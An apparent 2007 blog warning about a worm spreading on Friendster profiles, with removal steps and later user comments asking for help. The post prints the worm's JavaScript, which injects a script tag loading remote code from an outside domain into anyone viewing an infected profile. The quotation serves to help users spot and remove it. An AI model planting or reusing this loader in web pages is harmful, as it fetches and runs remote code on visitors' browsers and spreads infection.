Beware, Worm in Friendster!
Lately we found a kind of worm, spreading on Friendster. Friendster-Tweakers.com is not the creator of this worm and not connected to it in any way.
The infected profile will generate unwanted pop-up, and after viewing it your profile might get infected too!
Please check your media box. This is how the malicious code looks like:
httprequest= window.XMLHttpRequest? new XMLHttpRequest():new ActiveXObject("Msxml2.XMLHTTP");
scr = parent.document.createElement("script");
scr.setAttribute("type", "text/javascript");
scr.setAttribute("id", "scruotttt");
scr.setAttribute("src","http://bichirpolypterusgreen319.info/blah.js");
parent.document.getElementsByTagName("head")[0].appendChild(scr);
- My profile is infected! How to fix it?
1. Delete all the codes in your media section.
2a. For IE: delete temporary internet files.
2b. For Firefox: clear private data.
3. Stop viewing the infected profiles.
Thanks to Markyctrigger.
February 17th, 2007 | Friendster-Tweakers| « Floating Page Effect | Latest Friendster Update » |




January 23rd, 2009 at 2:48 pm
heLP!!!!!pag vinuview ko ung fs ko sa comment o sa prof ehh hindi nagpapakita ung mga pics ng prof at ung mga videos ng prof lahat ng nagpapakita ehh puru codes ng picture at videos….same sa comment
ex. hai musta na? long tym no see .sa lahat po ng prof nakikita ko tokapag nag viview ako ng prof nila bd3p
amf anu po gagawin ko pls help me!!!
January 12th, 2009 at 2:51 pm
help cra n fS p 2ro pnu m ayus ung media box kuh walng lumalabas asss in klng kulng ung code pg nilagay!!!!
January 2nd, 2009 at 12:59 pm
Here is what you should do:
1. Download Mozilla Firefox browser.
2. Install AdBlock Plus and NoScript add-ons.
That's it. Hope that helps. If you need further help, visit http://FriendsterTips.wordpress.com/.
December 31st, 2008 at 2:57 am
so its a java script injection
can u please tell me where did you get this malicious code
December 22nd, 2008 at 1:07 pm
no, you're not infected… don't worry… just delete it…
December 18th, 2008 at 10:22 am
I need some help..
I open a comment from my friend and i think its a virus,
No, its a virus.
I immediately deleted it, but I`m worried that I'm affected by the virus..
so, am i infected by virus?
If so, how can I delete it?
December 15th, 2008 at 12:25 pm
you should enable the safe mode in your settings. then open your profile. check if there's some weird syntax in your comments section. immediately delete this on your comments section. then turn off the safe mode. happy fs! gudday!
December 10th, 2008 at 12:33 am
bt ang hirap iview ang friendster???? hirap pumasok s wedsite nyo???? mis q nah mgfs…
hhhhhhhhhhhhhhhhhhmmmmmmmmmmmmmmmmmmmmmmmmmmmmm….
ad nyo q ULTRAELECTROMAGNETICHILEN@yahoo.com
mwuah…
December 9th, 2008 at 6:40 am
i badly need help…pls guys help me…
December 9th, 2008 at 6:17 am
i had a problem..everytym i view my profile an ad appear on it..it says friendster profile verification on top of an ad..i already erase all the codes and my apps..pls view my friendster and tell me how to solve this pls…vrnsls@yahoo.com…